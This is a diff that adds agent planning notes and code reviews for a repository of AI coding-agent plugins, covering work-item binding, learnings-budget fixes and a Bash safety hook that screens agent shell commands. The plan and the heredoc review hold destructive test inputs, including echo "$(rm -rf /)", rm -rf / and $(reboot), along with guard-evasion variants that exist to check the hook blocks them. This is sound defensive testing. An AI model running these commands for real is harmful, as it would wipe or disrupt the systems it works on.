+  "testing_requirements": ["Highest-practical-observation regression: SUBST_BOUNDARY fixtures through safety-net-guard-harness.ts driving the real hook (no e2e/browser harness applies — CLI hook surface; absence recorded in plan)", "bun run test green (never bare bun test — NAPI panic trap)"],
+  "skills": [],
+  "learnings": [],
+  "verification": {"type": "cli-test", "command": "printf '%s' '{\"tool_name\":\"Bash\",\"tool_input\":{\"command\":\"echo \\\"$(rm -rf /)\\\"\"}}' | plugins/lisa/hooks/parity-safety-net.sh; echo exit=$?", "expected": "block decision (exit 2/deny) for double-quoted substitution; exit 0 allow for single-quoted and benign controls"}
+}
+```
+
+### T4 — Independent review (lisa:test-specialist + lisa:quality-specialist)
+```json
+{
+  "plan": "1982-content-guard-subst-in-double-quotes",
+  "type": "bug",
+  "acceptance_criteria": ["Fixture matrix judged sufficient (block/allow pairs, evasion variants)", "Guard change reviewed for correctness and overblocking; findings fixed or explicitly waived by lead"],
+  "relevant_documentation": "T3 diff",
+  "testing_requirements": [],
+  "skills": [],
+  "learnings": [],
+  "verification": {"type": "documentation", "command": "review verdicts returned to lead", "expected": "no unresolved blocking findings"}
+}
+```
+
+### T5 — Empirical verification + verdict (lisa:verification-specialist — non-implementer)
+```json
+{
+  "plan": "1982-content-guard-subst-in-double-quotes",
+  "type": "bug",
+  "acceptance_criteria": ["Runs proof commands against the real built hook and observes results", "Writes .lisa/verification-status.json with per-criterion evidence (serializer, not hand-templated)"],
+  "relevant_documentation": "Completion condition above",
+  "testing_requirements": [],
+  "skills": [],
+  "learnings": [],
+  "verification": {"type": "cli-test", "command": "direct hook invocations (block + 2 allow controls) + bun run test named-spec output", "expected": "verification-status.json status=pass with observed evidence per criterion"}
+}
+```
+
+### T6 — Learnings review (lisa:learner)
+```json
+{
+  "plan": "1982-content-guard-subst-in-double-quotes",
+  "type": "bug",
+  "acceptance_criteria": ["Task learnings collected and processed"],
+  "relevant_documentation": "",
+  "testing_requirements": [],
+  "skills": [],
+  "learnings": [],
+  "verification": {"type": "documentation", "command": "learner report", "expected": "learnings triaged (kept/discarded) with rationale"}
+}
+```
+
+## Upstream PR obligations (from lisa-upstream-pr-flow)
+- Edit only plugins/src/base; `bun run build:plugins`; `bun run check:plugins` → "in sync".
+- If tracked skills/rules change: `bun run build:upstream-evidence-manifest` (hook change may not require it; verify via the determinism test).
+- Bind before commit: label #1982 `status:in-progress`, then `GITHUB_TOKEN=$(gh auth token) GITHUB_REPOSITORY=CodySwannGT/lisa node scripts/lisa-work-item.mjs bind CodySwannGT/lisa#1982`.
+- Every commit: exactly one `Work-Item: CodySwannGT/lisa#1982` trailer in the FINAL trailer paragraph next to Co-Authored-By; 🤖 line ABOVE the trailer block.
+- Merge: `gh pr merge --auto --merge` only (squash/rebase disabled). Verify #1982 actually closed post-merge; close manually if not.

--- a/.lisa/quality-review-1956.md
+++ b/.lisa/quality-review-1956.md
@@ -1,0 +1,163 @@
+# Quality Review — #1956 work-item sync lanes (T4)
+
+Reviewer: quality-specialist · Date: 2026-07-22 · Branch: `fix/1956-work-item-sync-lanes`
+Commits reviewed: `bdedff6e4`, `15d5ee8fb`, `5192d489d`
+
+Everything below is written for a non-technical reader. "Blocking" means the
+change must not be merged until it is fixed.
+
+## Verdict: ONE blocking problem, otherwise high quality
+
+The three fixes themselves are correct, well-tested, and well-explained. But
+the wording change in the instruction manual (commit 3) broke six existing
+automated checks that nobody updated, so the project's full test run currently
+FAILS on this branch. That must be fixed before merge.
+
+---
+
+## Critical (must fix before merge)
+
+### 1. The full test run fails: an older test still expects the old wording
+
+- **What:** Commit 3 rewrote a sentence in the `lisa-implement` instruction
+  file from "Rebase the feature branch onto `origin/<base>`…" to "Sync the
+  feature branch onto the latest `origin/<base>`…". An existing automated
+  check — written before this branch — reads that file and insists the OLD
+  sentence is present. It now fails for all six copies of the file.
+- **Why:** The project rule is "never approve code with failing tests," and CI
+  will go red. Concrete failure: run `bun run test` on this branch →
+  **6 failed, 7598 passed** (I ran it; the only failing file is this one).
+  The team's proof command (`bunx vitest run
+  tests/unit/scripts/lisa-work-item.test.ts tests/unit/hooks/`) IS green at
+  **472/472 — the claimed count is accurate** — but that command's scope does
+  not include the folder where this check lives, which is how the break was
+  missed.
+- **Where:** `tests/unit/strategies/implement-env-base-branch.test.ts:114`
+  (assertion `"Rebase the feature branch onto \`origin/<base>\`"`).
+- **Fix:** Update that one assertion to pin the new wording, e.g.
+  ``"Sync the feature branch onto the latest `origin/<base>`"`` (ideally also
+  pin a distinctive fragment of the new content, such as the rebase-lane or
+  merge-lane phrase, so the test keeps guarding the meaning, not just any
+  sentence). One-line test change; no product code change needed.
+- **Blocking:** Yes.
+
+---
+
+## Warning (should fix, not blocking)
+
+### 2. The new skill text slightly overpromises the merge lane
+
+- **What:** The new instruction text says the merge lane simply works: "push
+  validation exempts commits already reachable from the remote default
+  branch." In the code, that exemption only activates when git can locally
+  answer "what is the remote's default branch?" (the `origin/HEAD` pointer).
+  When it can't — e.g., a repository whose remote was added by hand rather
+  than cloned — validation deliberately stays strict, and a merge-synced push
+  can still be rejected with a confusing "work item … is closed" error.
+- **Why:** An agent following the skill to the letter in such a repo would hit
+  a rejection the text says cannot happen, and the error message gives no hint
+  that the missing `origin/HEAD` pointer is the cause. (The strict fallback
+  itself is correct and security-motivated — this is purely a documentation
+  gap. Normal `git clone` always sets the pointer, so the case is uncommon.)
+- **Where:** `plugins/src/base/skills/lisa-implement/SKILL.md:98` (and its five
+  generated copies); behavior in
+  `all/copy-overwrite/scripts/lisa-work-item.mjs` (`remoteDefaultRef`).
+- **Fix:** Either add half a sentence to the skill text ("requires the local
+  `origin/HEAD` pointer; run `git remote set-head <remote> --auto` if pushes
+  of merged base commits are rejected"), or extend the push-failure error
+  message with that hint. Regenerate fan-out via `build:plugins`.
+- **Blocking:** No — code behavior is correct and test-pinned; this is prose
+  precision.
+
+---
+
+## Suggestions (nice to have, not blocking)
+
+### 3. Abort-recovery prose skips the two fail-closed edge cases
+
+- **What:** The skill text says `git rebase --abort` "is a safe, allowed
+  recovery" until conflict resolutions exist. The hook additionally blocks
+  abort on the rarely-used `--apply` rebase backend and when the internal
+  `AUTO_MERGE` marker is missing — even with zero resolutions.
+- **Why:** Only matters if an agent explicitly runs `git rebase --apply`; the
+  skill's own instruction (`git rebase origin/<base>`) uses the default
+  backend, so the promise holds on the documented path.
+- **Where:** `plugins/src/base/skills/lisa-implement/SKILL.md:98`;
+  guard 3b in `plugins/src/base/hooks/parity-safety-net.sh:320`.
+- **Fix:** Optional parenthetical in the skill text, or leave as-is.
+
+### 4. Two different guard-numbering schemes now diverge further
+
+- **What:** The hook file numbers the new guard "3b" (so later guards keep
+  their numbers — tests still correctly say "guard 14" for custom rules). The
+  rules skill's human-facing list instead renumbered sequentially (new item
+  is #5; list grew 14 → 15, renumbering verified complete and contiguous).
+  "Guard 5" now means `rebase --abort` in the skill but `git switch` in the
+  hook.
+- **Why:** A future maintainer cross-referencing the two documents can grab
+  the wrong guard. The offset predates this branch (guard "1b" already caused
+  a ±1 skew); this change widens it to ±2 for later entries.
+- **Where:** `plugins/src/base/hooks/parity-safety-net.sh` comment numbering
+  vs `plugins/src/base/skills/lisa-parity-safety-net-rules/SKILL.md:69-92`.
+- **Fix:** A one-line note in either file that the two numberings are
+  independent, or adopt "5" / letter-suffix consistently. Follow-up material.
+
+### 5. A comment says "never `--remotes=<remote>`" right above a line that uses it
+
+- **What:** The security note on `remoteDefaultRef` (correctly) explains the
+  default-branch exclusion must never use `--remotes=<remote>`. Twelve lines
+  below, the pre-existing new-branch path still uses `--not --remotes=<remote>`
+  — a different, legitimate situation (a brand-new branch has no remote
+  counterpart to exploit), but a careful reader will see a contradiction.
+- **Where:** `all/copy-overwrite/scripts/lisa-work-item.mjs` (`remoteDefaultRef`
+  JSDoc vs the `ZERO_OID` arm of `parsePushLines`).
+- **Fix:** One clarifying comment on the new-branch arm explaining why
+  `--remotes` is acceptable there.
+
+---
+
+## What I checked and found GOOD (evidence)
+
+- **Correctness of the three fixes:** rebase-lane binding validation
+  (head-name probe, worktree-safe via `--git-path`), merge-lane exclusion
+  (`--not refs/remotes/<remote>/<default>`, symref-only offline resolution,
+  fail-safe strict), and conditional abort guard all read cleanly and match
+  their commit messages. Error message for a mismatched mid-rebase branch
+  names both branches correctly (pinned by test: "belongs to branch
+  'feature/tracked', not 'feature/other'").
+- **Comments explain WHY:** the symref fail-safe ("resolution failure means
+  the exclusion is skipped — fail-safe strict"), the `--remotes` security
+  rationale, and the empirical AUTO_MERGE discriminator (including why
+  "both diffs quiet" would wrongly block an untouched conflict stop) are all
+  documented at the point of use. Genuinely good comment hygiene.
+- **Shim untouched:** `scripts/lisa-work-item.mjs` has zero commits in this
+  range and remains a 5-line delegating entrypoint to the copy-overwrite
+  source of truth. Tests import the shim, so they exercise the real wiring.
+- **Test quality:** hermetic temp repos (`mkdtempSync` + `afterEach`/`afterAll`
+  cleanup), GIT_* environment stripping per the known repo learning
+  (`cleanGitEnv` / `stripGitVars`), no `.only`/`.skip` anywhere in the changed
+  files. I ran the two changed suites twice back-to-back: 211/211 both times —
+  no order dependence observed. Negative controls are complete: wrong-branch
+  mid-rebase rejected; no-symref stays strict; branch-authored closed item,
+  mixed refs, and missing trailer all still rejected with the exemption
+  active; pre-existing detached-HEAD-without-rebase test still pins
+  fail-closed. Fixtures drive REAL `git rebase` runs, not simulated state.
+- **Guard 3b style:** matches the existing "1b" insertion precedent; RB-* rows
+  follow the `gfx()`/`rfx()` builder pattern; RB-B5 pins the `git -C .`
+  global-option dodge (same model as GS-B4); RB-A3 (`--continue` allowed) and
+  RB-A4 (no rebase in progress) pin the allow side.
+- **Fan-out byte-identity:** all five hook copies (base + lisa, agy, copilot,
+  cursor) share one SHA-1. Both SKILL.md files are byte-identical across the
+  four variant plugins; the Codex `.codex-plugin` copies differ ONLY in the
+  frontmatter `description` (the Codex adapter's known truncation) — body
+  content including the new prose is identical.
+- **Commit hygiene:** three logically separated conventional commits
+  (fix/feat/docs); `Work-Item:` trailer is the last line of every message;
+  the documented formatter/manifest quirk from commit 1 is genuinely resolved
+  at HEAD — `bun run check:upstream-evidence-manifest` exits clean.
+- **Counts:** proof command `bunx vitest run
+  tests/unit/scripts/lisa-work-item.test.ts tests/unit/hooks/` = **472/472
+  passed** (claim verified). Full `bun run test` = 7598/7604 (the 6 failures
+  are Finding 1 only; a `check-learnings-budget` failure I saw once was an
+  artifact of my invoking vitest via npx instead of `bun run test` and is not
+  a branch defect).

--- a/.lisa/quality-review-1957.md
+++ b/.lisa/quality-review-1957.md
@@ -1,0 +1,67 @@
+# Quality + Security Review — #1957 bare repo-name label (T3)
+
+**Commit reviewed:** `b1052186f` (`fix(work-item): accept bare repo-name labels as repository scope`), branch `fix/1957-linear-bare-repo-label`. HEAD matches the commit for all four relevant paths (`git diff --stat b1052186f -- <paths>` is empty).
+
+**Verdict: APPROVE — no blocking findings.** 2 non-blocking suggestions below.
+
+---
+
+## Security lens (must-answer questions)
+
+### Q1 — Is the new third arm EXACT-match only? **YES — proven empirically.**
+
+- **Code reading:** `namesFrom` (`all/copy-overwrite/scripts/lisa-work-item.mjs:420-426`) lowercases each label string (or `{name}` object) and drops non-strings. The new arm is `labelNames.includes(bare)` (`:442`) where `bare = contract.identityRepo.toLowerCase()`. `Array.prototype.includes` is whole-element strict equality — there is no substring, prefix, regex, or `startsWith` anywhere in the path.
+- **Empirical probe:** extracted the shipped `namesFrom` + `assertRepoScope` verbatim from the file at HEAD and drove 17 hostile inputs through them (identityRepo `frontend`). All 17 behaved correctly:
+  - ACCEPTED: `frontend`, `repo:frontend`, `FRONTEND`, `frontend` vs identityRepo `FrontEnd` (case-insensitive both directions), `{name:"frontend"}` object form, Jira component `frontend`.
+  - REJECTED: `frontend-app` (suffix), `myfrontend` (prefix), `the-frontend-repo` (substring), `" frontend "` (whitespace-padded — labels are NOT trimmed, which is fail-closed: a padded label rejects rather than sneaking through), `repo:frontend-app`, `backend`, `sentry`, empty list, `{name:"frontendx"}`, component `frontend-app`, junk entries (`null`, `42`, `{}`).
+- **Test-suite pins:** mixed-case acceptance (`"Widgets"` vs repo `widgets`, test :893-903) and the wrong-repo / unrelated-bare / unscoped controls (test :906-946) pin this behavior; the `repo:other` + bare-`backend` controls kill an accept-any-label mutant.
+
+### Q2 — Can a bare label scope an item to the WRONG repo in any lane? **No new lane behavior; skip semantics unchanged.**
+
+- The commit touched only the **body** of `assertRepoScope` (`:428-448`) — all four call sites are byte-identical to before: GitHub `:551-552` (still guarded by `if (!contract.repositoryIsIdentity)`), Jira curl `:623`, Jira acli `:681`, Linear `:768`.
+- **GitHub queueRepo vs identityRepo:** `repositoryIsIdentity` (`:237`) is computed exactly as before; when queue == identity the check is still **skipped entirely** (research :542-544, now :551 after the diff shift). The new arm cannot change *when* the check runs, only what a *running* check accepts. The new GitHub test (test :470-490) exercises the split-queue lane (`repo: "identity"`, `queueRepo: "acme/widgets"`) — bare `identity` label accepted, status 0.
+- The bare label must equal `contract.identityRepo` — the **current repo's own short name** (derived via `repoBasename`: config → env → git remote). A bare label naming a *different* repo (`backend`) still rejects (probe + test :925-935). So an item can only newly bind in repo X if it carries the label exactly `x` — which is precisely the documented Sentry-provenance taxonomy.
+- **Accepted residual risk (by design, not a finding):** any bare label that happens to exactly equal a repo short name (e.g. a team label coincidentally named `frontend`) now scopes an item to that repo. This is the explicit intake-side rule the issue mandates mirroring (issue #1957; plan Option A; config-resolution.md:949). Exact-match + case-insensitivity is the documented boundary and it holds.
+
+### Q3 — Does the widened acceptance interact with `repositoryIsIdentity` or the Jira component arm? **No.**
+
+- `repositoryIsIdentity`: untouched — GitHub-contract-only field, sole consumer is the unchanged guard at `:551`.
+- Jira component arm: `componentNames.includes(bare)` is semantically identical to the old `componentNames.includes(contract.identityRepo.toLowerCase())` — same value, just hoisted into `bare`. Components still accept only the exact bare name (probe confirms component `frontend-app` rejects).
+- The widening is confined to the `labels` array. No other input (title, description, branch, env) feeds the decision.
+
+---
+
+## Quality checks
+
+| Check | Result |
+| --- | --- |
+| Targeted suite | `bunx vitest run tests/unit/scripts/lisa-work-item.test.ts` → **27/27 passed** (run by this reviewer at HEAD) |
+| Full-suite claim | Fixer recorded a full `bun run test` pre-commit; targeted suite independently green, change surface is one function + tests + manifest → recorded full run trusted |
+| Manifest hash | `shasum -a 256` of the mjs at HEAD = `f12006df…db72` = exactly the manifest value in `src/core/upstream-evidence-manifest.ts:8` ✔ |
+| Shim | `scripts/lisa-work-item.mjs` — 0-byte diff, still the 5-line re-import ✔ |
+| Message-tail pins | Repo-wide grep for `require label` / `not scoped to repository`: only the source line + 7 test `toContain` pins, **all** pin the surviving `not scoped to repository <name>` prefix; no doc/skill/wiki pins either tail. New tail (`require label repo:X or bare label X`) matches shipped behavior verbatim ✔ |
+| Controls complete | All four stay-rejected controls present: unscoped (test :913), bare wrong-repo `backend` + `repo:backend` (:925), unrelated bare `sentry` (:938), pre-existing `repo:other` (:843) ✔ |
+| Commit hygiene | Conventional format `fix(work-item): …`; `Work-Item:` trailer is the last non-empty line (verified `cat -e`) ✔ |
+| Comment citations | `:949` exact — "uniform across trackers… component alias" is at config-resolution.md:949 ✔. `:973` is off by 5 — see S2 |
+| Coding philosophy | No mutation, consts only, single throw path; new test helper has JSDoc ✔ |
+
+## Findings (ranked)
+
+### Critical — none
+### Warning — none
+
+### Suggestion
+
+**S1 — Duplicate Linear response builders in the test file (test-coverage/clarity, non-blocking)**
+- **What:** The new hoisted helper `linearIssueResponse(labels)` (tests/unit/scripts/lisa-work-item.test.ts:173-186) builds the exact same JSON payload as the pre-existing local helper `response(labels, children)` (:827-841) — same id, identifier, team, state, node shapes. The hoist added a second helper instead of consolidating; three old use sites (:845, :857, :865) still use the local one.
+- **Why:** Two identical payload builders can drift apart silently; a future payload-shape change fixed in one leaves the other stale. No behavioral difference today — both suites pass and the payloads are structurally identical for the labels-only case.
+- **Fix (follow-up, not this PR):** give `linearIssueResponse` an optional `children: object[] = []` second parameter and delete the local helper at :827.
+
+**S2 — Comment citation off by 5 lines (documentation, non-blocking)**
+- **What:** The new comment in `assertRepoScope` (all/copy-overwrite/scripts/lisa-work-item.mjs:430) cites `config-resolution.md:949,:973`. The `:949` half is exact; the "match is by repo short name, case-insensitive" sentence is actually at **:968**, not :973.
+- **Why:** The claimed *content* is accurate — only the second line number drifted (the research doc carried the same :973). Harmless today, mildly misleading to a future reader.
+- **Fix (optional):** `:973` → `:968`, or drop line numbers and cite the section heading ("Repo scoping / The `repo:<name>` label"), which won't rot.
+
+---
+
+*Reviewer: quality-specialist (T3, with security lens per roster-1957). No code changes made.*

--- a/.lisa/quality-review-1958.md
+++ b/.lisa/quality-review-1958.md
@@ -1,0 +1,63 @@
+# Quality Review — heredoc-classifier-fps (CodySwannGT/lisa#1958)
+
+**Reviewer:** quality-specialist (T4) · **Branch:** feat/1958-heredoc-classifier-fps · **Commits:** 77f4499a5 (RED), df5981888 (GREEN)
+**Verdict: APPROVE — no blockers.** Correctness, coding philosophy, test coverage, and documentation all meet the bar. Three non-blocking suggestions below.
+
+## Verification performed (all green)
+
+- `bun run build:plugins` → exit 0; no working-tree drift after rebuild.
+- `bun run check:plugins` → exit 0 ("Plugin artifacts are in sync… Marketplace registers every built plugin").
+- `bun run check:upstream-evidence-manifest` → exit 0 (manifest at HEAD, no stale gate).
+- Fan-out byte-identity: md5 of both `parity-safety-net-heredoc.py` and `parity-safety-net.sh` is identical across `src/base`, `lisa`, `lisa-agy`, `lisa-cursor`, `lisa-copilot`.
+- Targeted suites: `tests/unit/hooks` = 24 files / 461 tests pass; adding the two parity mirrors (agy + opencode) = 26 files, consistent with the builder's "26 files / 469" claim. The six safety-net-focused files run 249/249 green. No `.only` / `.skip` / `fit` / `xit` anywhere.
+- Live hook drives (real `parity-safety-net.sh`, JSON on stdin):
+  - F1 `python3 <<'EOF'` with backtick markdown in a string → **exit 0 (allowed)**.
+  - F1b/F3 unquoted delimiter with `$(date)` → **exit 2 (blocked at the wall)**.
+  - F2 quoted body carrying `rm -rf /` + `$(reboot)` → **exit 2 via the rm content guard** (also self-confirmed: my own probe command was blocked by the same guard).
+  - F6 non-commit heredoc denial → "**Write tool**" text; commit-shaped and `git -C /tmp/x commit …` → "**git commit -F <file>**" text (proves the inlined global-opts shape recognizes `git -C <path> commit`).
+
+I judge the builder's full-suite evidence credible; the change surface is confined to the hook pair + tests, so targeted green is sufficient.
+
+## Deviation 1 check (new test file vs research §3)
+
+Research §3 predicted a new isolated-classifier file would be "a new (but consistent) convention" only if it drove `python3` directly on stdin. The builder went further toward consistency: `parity-safety-net-heredoc-literal.test.ts` drives the **shell hook** via `spawnSync("/bin/bash", [HOOK_PATH])` with JSON stdin and asserts `status` + `stderr` — the exact established `runHook` convention already used by the sibling suites. Precedent is real and the deviation is well-justified: it groups the #1958 literal-payload (F1/F2/F3/F5) and F6 remediation-text cases cohesively without bloating the 240-line main suite. Naming matches the family (`-heredoc-literal`, alongside `-heredoc`, `-guards`). File is 142 lines — comfortably within limits, so no max-lines rationale is required.
+
+---
+
+## Findings
+
+### Critical (must fix before merge)
+None.
+
+### Warning (should fix)
+None.
+
+### Suggestion (nice to have)
+
+**S1 — The git-commit detector is a hand-copied twin of the canonical `GIT_CMD`/`GIT_GLOBAL_OPTS` fragments and can silently drift.**
+- **What:** `block_heredoc()` inlines the regex `…git[[:space:]]+(-[^;&|…]+…)*commit…`, which is byte-for-byte the composition `GIT_CMD + commit(…)`. But `GIT_CMD`/`GIT_GLOBAL_OPTS` are declared `readonly` later in the file (~line 165), after the heredoc dispatch runs, so the function genuinely cannot reference them.
+- **Why it could matter:** If a future security fix widens `GIT_GLOBAL_OPTS` (as #1960 already did once), this copy won't follow, and `git <new-global-opt> commit …` heredoc denials would quietly regress to the wrong (Write-tool) remediation. It is *only* remediation-message accuracy — never an allow/block decision — so severity is low.
+- **Where:** `plugins/src/base/hooks/parity-safety-net.sh:107-108`.
+- **Fix:** The inline comment already flags the ordering constraint, which is the important part. If you want belt-and-suspenders, add a one-line pin test asserting the two regexes stay in sync, or leave a `# keep in sync with GIT_GLOBAL_OPTS below` marker on both sites. Non-blocking.
+
+**S2 — The commit-shape grep scans the whole command, including the heredoc body.**
+- **What:** The detector greps `$command_str` in its entirety. A *blocked* non-commit heredoc whose payload text merely mentions `git … commit` (e.g. a doc string) would receive the "git commit -F" remediation instead of the Write-tool one.
+- **Why it could matter:** Purely cosmetic — the wrong-but-adjacent remediation text on an already-denied command. It cannot cause a bypass or a wrong allow/block. Real commit invocations and the F6 fixtures are unaffected.
+- **Where:** `plugins/src/base/hooks/parity-safety-net.sh:106`.
+- **Fix:** Acceptable as-is given the low stakes; if tightened later, match against the command line proper rather than the payload. Non-blocking.
+
+**S3 — `strip_provably_literal_body()` mixes `splitlines()` with `count("\n")` for line indexing.**
+- **What:** The marker line is located with `command.count("\n", 0, marker.start)` while the body is sliced from `command.splitlines()`. `splitlines()` also breaks on `\r`, `\v`, `\f`, etc., so an embedded control char could misalign the two.
+- **Why it's not a problem here:** This function only ever runs when `len(markers) == 1 and markers[0].quoted` — i.e. a delimiter bash treats as literal, so any substitution token in the body is inert regardless. Worst case is losing the (redundant) heredoc *wall* for a payload bash won't expand anyway, and the **raw command still flows to every content guard** because the class stays UNSUPPORTED, never SAFE. It also matches the pre-existing `marker_is_closed()` convention, so it isn't new debt.
+- **Where:** `plugins/src/base/hooks/parity-safety-net-heredoc.py:389-392`.
+- **Fix:** None needed. Flagged only for awareness / future consistency. Non-blocking.
+
+---
+
+## What was done well
+
+- **Correctness / mutation-proofing:** The `quoted` flag is set conservatively — full quote pair only, next char must terminate the token (`<<'EOF'X` → `quoted=False`), and `strip_provably_literal_body` is gated on `len(markers)==1 and quoted and closed`. F3 (unquoted), F4 (backslash/partial), F5 (unclosed), chained (`len>1`), and header-line `$()` outside the body window all remain fail-closed. The GREEN commit message documents the three mutations that break specific fixtures.
+- **Coding philosophy:** `strip_provably_literal_body` is a pure function (no mutation of inputs, single return value per branch); the shell conditional cleanly picks one remediation and exits. No dead code — `quoted` is threaded through `Marker`, `parse_marker`, and consumed in `main()`.
+- **Documentation:** The deliberate POSIX divergence (`<<\EOF`, `<<EO'F'`) is explained in-code at both `parse_marker` and the module docstring, with the "why" (parser can't *prove* non-expansion) not just the "what". The F4 test block restates it as a drift detector.
+- **Test coverage:** Behavior-focused (asserts allow/block + guard-origin via stderr, not parser internals), F2 is a genuine no-bypass control (asserts the block comes from `recursive forced delete`, *not* the heredoc wall), and the fixtures pin today's F4 divergence so it surfaces if it ever regresses.
+- **Commit hygiene:** Two conventional commits, RED before GREEN, `Work-Item: CodySwannGT/lisa#1958` trailer as the last line of each.

--- a/.lisa/quality-review-1959.md
+++ b/.lisa/quality-review-1959.md
@@ -1,0 +1,72 @@
+# Quality Review — learnings-ledger-budget (CodySwannGT/lisa#1959)
+
+Reviewer: quality-specialist (T3), external-artifact/idempotency lens folded in per roster-1959.
+Commit: 2827d69ed. Branch: fix/1959-learnings-ledger-budget. Working dir clean of code changes (only untracked .lisa/* artifacts).
+
+**Verdict: APPROVE — merge. No Critical, no Warning. Three non-blocking Suggestions.**
+
+Every load-bearing claim in the fix was independently verified. Tests pass (31/31 across the two targeted files), fanout is complete across all 6 projections, the manifest is fresh and its `--check` gate is green, and no live `4000` byte cap survives anywhere in source, tests, skills, or CI.
+
+---
+
+## What was verified (the load-bearing claims)
+
+### Fix 2 — saturation-signal discipline (the folded-in soundness lens)
+
+**(a) The marker genuinely dodges the gardener's auto-exclusion.** CONFIRMED.
+The gardener's exclusion registry (`plugins/src/base/skills/lisa-learnings-audit/SKILL.md:81-89`) is an *explicit* list of markers: `[lisa-gardener]`, `[lisa-learning-*]` (drop / pr / upstream-handoff), `[lisa-rejection-candidate]`, `[lisa-archaeology-candidate]`, and the `learning:needs-triage` label. The new marker `[lisa-ledger-saturated]` matches none of them — "ledger" is not "learning", and there is no broader `[lisa-*]` wildcard. So the signal is not swallowed by the exclusion. The one imprecision is in the reverse direction — see Suggestion 1.
+
+**(b) Idempotency — fires once per saturation episode, not per capture; open-only dedupe is sound.** CONFIRMED.
+The signal lives strictly in the over-budget branch ("On a budget-forced drop", `lisa-persist-learning/SKILL.md:177`), gated on the writer's budget re-assertion failing even after consolidation — so a normal capture never fires it. The fingerprint keys on the **ledger file path, not the candidate** (`sat-` + first 12 hex of `sha1(resolved learnings-file path)`), so every drop in a given project collapses to one fingerprint. Open-only dedupe means: while a saturation ticket is open, later drops find it and stay silent; a *closed* ticket (room reclaimed) lets the next genuine saturation open a fresh, actionable ticket. The divergence from the drop/upstream markers (which dedupe open+closed) is justified in-prose (`SKILL.md:177`): searching closed tickets too "would permanently suppress every later saturation." Sound.
+
+**(c) No spam lane.** CONFIRMED.
+A persistently-saturated ledger across many captures emits exactly one open signal: the first drop opens the ticket, every subsequent drop dedupes against it. The only way a second ticket appears is after a human *closes* the first — i.e. after they signalled "handled." Worst case is a close→reopen ping-pong driven by human closes, which self-limits to one open ticket at a time and is the correct behavior (a still-saturated ledger after a premature close is real pressure). No per-capture churn.
+
+**(d) Deterministic, documented fingerprint.** CONFIRMED. `sha1` of the resolved path is deterministic; the formula and its rationale ("keys on the ledger, not the candidate") are written out verbatim in the skill. `sha1` here is a dedupe key, not a security primitive — no concern.
+
+**No candidacy loop.** CONFIRMED. The gardener inventories knowledge *surfaces* — ledger entries, rules trees, skills, wiki, mechanical controls (`SKILL.md:119`, `:91-98`) — not arbitrary tracker Tasks. A standalone `[lisa-ledger-saturated]` Task carries no `learning:needs-triage` label and sits on no inventoried surface, so it can never become a ladder candidate. The exclusion-registry membership question is therefore moot for candidacy; it matters only for the (non-)evidence path in Suggestion 1.
+
+### Fix 1 — derived budget
+
+- `maxTokens` is derived from the **same** `MAX_ENTRIES` const as `maxEntries` (`src/core/learnings-contract.ts:13,44-45`: both read `MAX_ENTRIES`; `maxTokens = MAX_ENTRIES * PER_ENTRY_BYTE_ALLOWANCE`). They cannot re-diverge without editing the shared const. CONFIRMED.
+- `PER_ENTRY_BYTE_ALLOWANCE = 600` covers the observed worst case (606 B/entry max, 490 avg per research) with headroom; 20 × 600 = 12000. Justified.
+- The derivation-pin test (`learnings-contract.test.ts:70-79`) asserts both the concrete `600` and the relationship `maxTokens === maxEntries * PER_ENTRY_BYTE_ALLOWANCE`, so a re-hardcode back to a flat 4000 breaks the pin. The frozen-contract snapshot also updated 4000→12000. Effective.
+- **No live `4000` survives.** Grep of `src/ tests/ scripts/ plugins/src/base/skills/` for `4000` in any learnings/token/budget/ledger context returns only: the historical-explanation JSDoc comment (`learnings-contract.ts:24`), and intentional test comments + `RETIRED_FLAT_BUDGET = 4000` used as a lower-bound assertion in R1. CI `quality.yml` has no `4000` (it runs the published pinned CLI, as research expected). CONFIRMED.
+
+### Test quality
+
+- `bunx vitest run` on both files: **31 passed, 0 skipped, 0 only.**
+- R1 fixture (`realisticEntry`, `check-learnings-budget.test.ts:328-343`) builds `maxEntries` schema-valid entries (near-cap single-line rule, causal why, two provenance refs) totalling ~9.3 KB, and *asserts the band* (`> RETIRED_FLAT_BUDGET`, `< DERIVED_BUDGET`) so the fixture can't silently drift out of the repro window. Controls present: over-entry-cap still fails maxEntries, per-field/byte breach still fails (with a fixture guard `measuredTokens > maxTokens`), small ledger passes.
+
+### Fanout, manifest, hygiene
+
+- All **6** projections updated: the 5 Claude-format copies (`src/base`, `lisa`, `lisa-agy`, `lisa-cursor`, `lisa-copilot`) are byte-identical (`sha256 1881564d…`); the 6th, `plugins/lisa/.codex-plugin/…`, has a different whole-file hash only because Codex plugin format carries different frontmatter — its saturation-block **text is identical** (verified by diff). No projection was missed.
+- `bun run build:upstream-evidence-manifest` leaves no diff; `check:upstream-evidence-manifest --check` exits 0. Manifest at HEAD is current.
+- Commit header is conventional (`fix(learnings): …`); the `Work-Item:` trailer is the last line (satisfies the pre-push hook).
+
+---
+
+## Suggestions (non-blocking)
+
+### Suggestion 1 — SKILL prose overstates the gardener linkage
+- **What:** The skill says the marker is "chosen so the gardener reads it as budget-pressure evidence." The gardener does not mechanically ingest this ticket — it derives budget pressure independently from the `projectLearnings` projection omission (research §4; `lisa-learnings-audit/SKILL.md:120` gathers the five axes per inventoried item, and the ticket is not an inventoried item).
+- **Why:** A future maintainer could believe the ticket feeds the gardener's evidence and rely on a link that isn't there. In practice the marker placement is still correct — its real jobs are (i) not being *excluded* as learning-machinery noise, and (ii) operator-visible notification — both of which hold.
+- **Where:** `plugins/src/base/skills/lisa-persist-learning/SKILL.md` (the "outside the `[lisa-learning-*]` namespace … reads it as budget-pressure evidence" sentence) and the mirror in the commit message.
+- **Fix:** Reword to "so the gardener does not filter it out as learning-machinery noise, and it stays operator-visible alongside the gardener's own projection-derived budget-pressure axis" — i.e. drop the implication that the gardener *consumes* the ticket.
+
+### Suggestion 2 — duplicate `Work-Item:` trailer in the commit body
+- **What:** `Work-Item: CodySwannGT/lisa#1959` appears twice — once mid-body after the repro paragraph, once as the final trailer line.
+- **Why:** Cosmetic only; the hook requires the trailer to be the last line, which it is. No functional impact.
+- **Where:** commit 2827d69ed message body.
+- **Fix:** Drop the mid-body occurrence in future commits; nothing to do here (history is immutable and correct).
+
+### Suggestion 3 — R1 fixture entries are clones
+- **What:** All 20 `realisticEntry` rows share identical `rule`/`why`; only `id` and one provenance ref vary.
+- **Why:** Fine for a byte-budget test (it only needs realistic total bytes), but "20 real entries" is really one entry ×20. No correctness impact.
+- **Where:** `tests/unit/scripts/check-learnings-budget.test.ts:328-343`.
+- **Fix:** Optional — vary the prose if you later want the fixture to also exercise content diversity.
+
+---
+
+## Bottom line
